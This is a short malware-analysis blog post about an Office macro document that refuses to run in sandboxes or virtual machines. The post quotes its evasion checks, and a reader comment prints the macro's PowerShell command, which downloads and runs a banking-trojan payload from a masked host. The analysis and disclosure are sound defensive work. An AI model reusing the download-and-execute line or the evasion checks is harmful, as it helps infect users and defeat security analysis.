Didier Stevens

Wednesday 11 March 2015

VBA Maldoc: We Don’t Want No Stinkin Sandbox/Virtual PC

Filed under: Malware — Didier Stevens @ 20:06

Today I got an interesting maldoc sample (77f3949c2130b268bb18061bcb483d16): it will not activate if it runs in a sandboxed or virtualized environment.

The following statements are executed right before the malicious actions begin:

    If IsSandBoxiePresent(1) = True Then End
    If IsAnubisPresent(1) = True Then End
    If IsVirtualPCPresent = True Then End

The presence of SandBoxie can be detected by the successful load of DLL Sbiedll.dll or the presence of string [#] in the Windows’ title. In this sample, the DLL is checked (1).

The presence of Anubis can be detected by checking the serial number of the system drive, checking Windows’ Product ID, checking the name of the application or the user. In this sample, the serial number is checked (1).

The presence of virtualization is detected by enumerating the services\disk and looking for strings “virual”, “vmware” or “vbox”.

With the help of Google, I discovered that the criminals copy/pasted 7 year old code posted on a forum here, here and here. It’s in Spanish, while the Excel document has code page 1251 ANSI Cyrillic.

5 Comments »

  1. Soo…. we should surf from a VM pc.

    Comment by Johann Wilkerson — Wednesday 11 March 2015 @ 21:11

  2. Or… we should make our estate look like virtuals… untill they start trashing virtuals to try to upset the researchers of course 😉

    Comment by Chris — Thursday 12 March 2015 @ 13:03

  3. The VBA macro performs the PowerShell with the following command:
    “cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://*.*.*.*/asdvx/fghs.php’,’%TEMP%\dsfsdFFFv.cab’); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;”

    Comment by RobbyFux — Thursday 12 March 2015 @ 22:04

  4. hxxp://*.*.*.*/asdvx/fghs.php downloads cridex banking trojan

    Comment by RobbyFux — Thursday 12 March 2015 @ 22:10

  5. sha256 37730a644aed8c76d8cc55bd2740c37d3ec488d3fa9b7c29aec4b52c160f0322

    Comment by RobbyFux — Thursday 12 March 2015 @ 22:10


RSS feed for comments on this post. TrackBack URI

Leave a Reply (comments are moderated)

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Blog at WordPress.com.

%d bloggers like this: